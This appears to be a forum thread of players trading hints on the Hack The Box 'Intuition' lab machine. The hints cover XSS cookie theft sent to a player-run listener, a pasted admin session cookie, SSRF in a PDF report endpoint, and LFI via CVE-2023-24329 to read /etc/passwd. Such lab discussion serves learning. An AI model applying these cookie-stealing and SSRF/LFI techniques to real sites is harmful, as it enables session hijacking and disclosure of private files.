[mycatdante]

After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

[asdfmonster]

can they please fix this stupid box. so frustrating.

[meoami]

After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?

[mycatdante]

After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?

I am working on it. Good news is that I tried the way the article introduce:

I make an index.html with <ifram> tag. Put our IP inside the tag and the server request 2nd time and I think it's the ssrf. Still figuring out how to get the 2nd cookie or other thing. 

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.177.46 - - [28/Apr/2024 02:06:49] "GET / HTTP/1.1" 200 -      <- 1st request
10.129.177.46 - - [28/Apr/2024 02:06:51] "GET /?cookie=+document.cookie HTTP/1.1" 200 -     <- 2nd request SSRF

[trevor69000]

If anyone stuck on this xss
admin cookie eyJ1c2VyX2lkIjogNiwgInVzZXJuYW1lIjogIjEyMzQiLCAicm9sZSI6ICJ1c2VyIn18NTQ5ZGU5NjRjY2NlOGE4NDI4ZTA0ZGMwNzU2ZGE4YmI5NzA1ODlkOTEzYjI0Y2Y5OGZlYTliNzM3Y2E3ZjY5NA==
try it if it works move on to http://dashboard.comprezzor.htb/create_pdf_report

[terminaluzer1]

anything for root?

[jsvensson]

After the XSS part. Clearly there is an SSRF in /create_pdf_report. It will download file from our url and create a PDF.

Anyone found something how to leverage this? It looks like a wkhtmltopdf vuln related to the recent web challenge I found an article https://4xura.com/ctf/htb/htb-writeup-web-pdfy/

how can you get 2nd user cookie?

when you get first webdav user 
again
POST  report with some text and payload <img....>
then on dashboard set priority to this new report to high

[asdfplayer]

hmm , i just run
nc -nvlp 80
and provide url to my server as param then i found cookie send as header

Listening on 0.0.0.0 80
Connection received on 10.10.11.15 44208
GET / HTTP/1.1
Accept-Encoding: identity
Host: 10.10.15.3
User-Agent: Python-urllib/3.11
Cookie: user_data=eyJ1c2VyX2lkIjo
Connection: close

i use it to access the dashboard , this cookie is for admin
then i found LFI by ssrf identified by cve-2023–24329 i tried this because of user-agent header and now we have lfi
i download /etc/passwd as pdf and i check his content and metadata and i found it generated by wkhtmltopdf 0.12.6

---

any hint for get a shell ?

[CryAboutIt]

Intuition writeup

https://hackthesquare.mysellix.io/produc...on-writeup

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB

[vanatka123]

user, finally
use the SSRF to find application code
use that same ssrf to access the next hop (http is not the only protocol
convert key
profit.

now for the root....

How do you know the location of the source code?